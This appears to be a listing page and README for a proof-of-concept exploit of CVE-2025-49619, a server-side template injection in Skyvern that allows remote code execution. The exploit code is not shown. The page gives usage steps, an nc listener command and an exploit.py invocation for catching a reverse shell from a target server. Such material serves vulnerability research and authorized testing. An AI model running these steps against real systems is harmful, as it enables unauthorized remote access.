
CVE-2025-49619 PoC — Ikonomos Skyvern Security Vulnerability

Associated Vulnerability
Title: Ikonomos Skyvern Security Vulnerability (CVE-2025-49619)
Description: Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).
Description
This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.
Readme
# CVE-2025-49619 PoC

---

**This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.**

---

## Author

- **Name:** Cristian Branet  
- **GitHub:** [cristibtz](https://github.com/cristibtz)

---

## Usage

### 1. Start a listener

```bash
nc -lvnp <PORT>
```

### 2. Run the exploit

```bash
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -k "<X-API-KEY>" -i <LOCAL_IP> -p <PORT>
```

- `<TARGET_IP>`: Skyvern server IP
- `<TARGET_PORT>`: Skyvern server port
- `<X-API-KEY>`: Your Skyvern API key (Settings → API Key)
- `<LOCAL_IP>`: Your IP to receive the reverse shell
- `<PORT>`: Port for the reverse shell (must match your listener)

---

**Disclaimer:**  
This code is for educational and authorized testing purposes only.
File Snapshot

[4.0K] /data/pocs/0fbd31fd4286ba1dc1f81fd530db601f641f895b
├── [4.4K] exploit.py
├── [ 916] exploit-workflow.json
├── [ 766] README.md
└── [  27] requirements.txt

0 directories, 4 files